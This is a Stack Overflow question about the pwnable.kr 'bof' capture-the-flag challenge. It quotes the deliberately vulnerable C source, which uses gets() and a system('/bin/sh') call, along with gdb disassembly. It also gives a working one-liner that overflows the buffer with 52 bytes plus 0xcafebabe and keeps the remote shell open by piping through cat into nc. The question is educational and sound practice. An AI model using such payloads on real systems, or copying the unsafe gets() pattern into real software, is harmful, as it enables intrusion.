Why use cat to open interactive shell?

0

(Asking again without the download link)

Problem Description

Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);       // smash me!
        if(key == 0xcafebabe){
                system("/bin/sh");
        }
        else{
                printf("Nah..\n");
        }
}
int main(int argc, char* argv[]){
        func(0xdeadbeef);
        return 0;
}

bof

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000068a <+0>: push   %ebp
   0x0000068b <+1>: mov    %esp,%ebp
   0x0000068d <+3>: and    $0xfffffff0,%esp
   0x00000690 <+6>: sub    $0x10,%esp
   0x00000693 <+9>: movl   $0xdeadbeef,(%esp)
   0x0000069a <+16>:    call   0x62c <func>
   0x0000069f <+21>:    mov    $0x0,%eax
   0x000006a4 <+26>:    leave  
   0x000006a5 <+27>:    ret    
End of assembler dump.
(gdb) disassemble func
Dump of assembler code for function func:
   0x0000062c <+0>: push   %ebp
   0x0000062d <+1>: mov    %esp,%ebp
   0x0000062f <+3>: sub    $0x48,%esp
   0x00000632 <+6>: mov    %gs:0x14,%eax
   0x00000638 <+12>:    mov    %eax,-0xc(%ebp)
   0x0000063b <+15>:    xor    %eax,%eax
   0x0000063d <+17>:    movl   $0x78c,(%esp)
   0x00000644 <+24>:    call   0x645 <func+25>
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
   0x00000669 <+61>:    jmp    0x677 <func+75>
   0x0000066b <+63>:    movl   $0x7a3,(%esp)
   0x00000672 <+70>:    call   0x673 <func+71>
   0x00000677 <+75>:    mov    -0xc(%ebp),%eax
   0x0000067a <+78>:    xor    %gs:0x14,%eax
   0x00000681 <+85>:    je     0x688 <func+92>
   0x00000683 <+87>:    call   0x684 <func+88>
   0x00000688 <+92>:    leave  
   0x00000689 <+93>:    ret    
End of assembler dump.

Solution

https://0xrick.github.io/pwn/bof/

I understand that we have to supply 52 trash characters and cafebabe to overflow the buffer. But when I only pass that as an input, I don't get an interactive shell. It's only when I pass in cat command as well. Why is cat necessary??

---EDIT---

I forgot to mention that this is running on the server and I connect to it using nc pwnable.kr 9000. I pass in the input as python -c 'print("A"*52 + "\xbe\xba\xfe\xca")' | nc pwnable.kr 9000. The correct answer is said to be (python -c 'print("A"*52 + "\xbe\xba\xfe\xca")'; cat) | nc pwnable.kr 9000

c
bash
terminal
ctf
pwntools
asked on Stack Overflow Oct 27, 2020 by luke.lcim • edited Oct 28, 2020 by Peter Cordes

0 Answers

Nobody has answered this question yet.


User contributions licensed under CC BY-SA 3.0